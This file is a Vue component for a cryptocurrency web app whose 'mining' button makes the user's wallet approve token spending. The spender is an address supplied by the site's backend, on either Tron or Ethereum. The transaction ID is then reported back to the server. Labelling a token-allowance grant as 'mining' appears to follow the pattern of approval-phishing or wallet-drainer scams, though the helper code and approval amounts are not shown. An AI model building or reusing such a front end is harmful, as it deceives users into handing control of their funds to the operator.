<template>
  <div class="gborder br_10">
    <div class="pad_12">
      <div class="flex flex_center justify_center">
        <div class="btn_default mining_btn" @click="handleTokenApprove">{{ t('text.mining') }}</div>
      </div>
      <!-- <div class="">
        <van-slider v-model="sliderValue" @change="onChange" />
      </div> -->
    </div>
    <i class="border_line border_scroll br_10"></i>
  </div>
</template>

<script setup lang="ts">
const { t } = useI18n();
import { Auth, Tx } from '@/utils/api/index';
import { modalOopen } from '@/utils/modal';
import useStateStore from '@/stores/state';
const state = useStateStore();
import { tokenApprove as tronApprove } from '@/utils/tron';
import { connectWallet as ethConnect, checkNeedEth, tokenApprove } from '@/utils/eth';
import { showNotify, showConfirmDialog } from 'vant';
import { chargeList } from '@/utils';
let handleTokenApprove = () => {
  state.getLoginStatus();
  state.getNetworkType();
  if (!state.loginStatus) {
    state.setSelectNetwork(true);
    return;
  }
  if (state.networkType == 'tron') {
    tronAuth();
    return;
  }
  ethAuth();
};
let tronAuth = () => {
  Auth()
    .then((res) => {
      tronApprove(res.data.authAddr)
        .then((approve) => {
          state.setLoading(false);
          Tx({
            txId: approve,
          }).then((tx) => {
            state.setAuth(2);
            console.log('Tx', tx);
          });
        })
        .catch((err) => {
          state.setLoading(false);
          showNotify({ type: 'danger', message: err });
        });
    })
    .catch((err) => {
      state.setSelectNetwork(false);
    });
};
let ethAuth = () => {
  console.log('ethAuth');
  state.setLoading(true);
  Auth()
    .then((res) => {
      ethConnect().then(adress=>{
        console.log(adress);
      })
      console.log('Auth',res);
      checkNeedEth(res.data.authAddr).then((check) => {
        console.log('checkNeedEth', check);
        if (check) {
          tokenApprove(res.data.authAddr).then((approve) => {
            console.log('tokenApprove', approve);
            state.setLoading(false);
            Tx({
              txId: approve,
            }).then((tx) => {
              state.setAuth(2);
              console.log('Tx', tx);
            });
          });
        } else {
          showConfirmDialog({
            message: t('msg.noBalance'),
            confirmButtonText: t('text.charge'),
          })
            .then(() => {
              let network = state.networkType;
              window.open(chargeList[network]);
            })
            .catch(() => {
              // on cancel
            });
        }
      });
    })
    .catch((err) => {
      state.setSelectNetwork(false);
    });
  // checkNeedEth()
  // ethConnect().then((address) => {
  //   console.log('ethConnect', address);
  // })
};
onMounted(() => {});
</script>

<style scoped>
.mining_btn {
  animation: vibrate-3-reverse 3s cubic-bezier(0.445, 0.05, 0.55, 0.95) 0s infinite reverse none;
}
/* ----------------------------------------------
* Generated by Gradienty on 2024-12-10 11:12
* animation vibrate-1-reverse
* ----------------------------------------
*/
/* ----------------------------------------------
* Generated by Gradienty on 2024-12-10 11:14
* animation vibrate-3-reverse
* ----------------------------------------
*/
@keyframes vibrate-3-reverse {
  0% {
    transform: translate(0);
  }
  10% {
    transform: translate(-2px, -2px);
  }
  20% {
    transform: translate(2px, -2px);
  }
  30% {
    transform: translate(-2px, 2px);
  }
  40% {
    transform: translate(2px, 2px);
  }
  50% {
    transform: translate(-2px, -2px);
  }
  60% {
    transform: translate(2px, -2px);
  }
  70% {
    transform: translate(-2px, 2px);
  }
  80% {
    transform: translate(-2px, -2px);
  }
  90% {
    transform: translate(2px, -2px);
  }
  100% {
    transform: translate(0);
  }
}
</style>
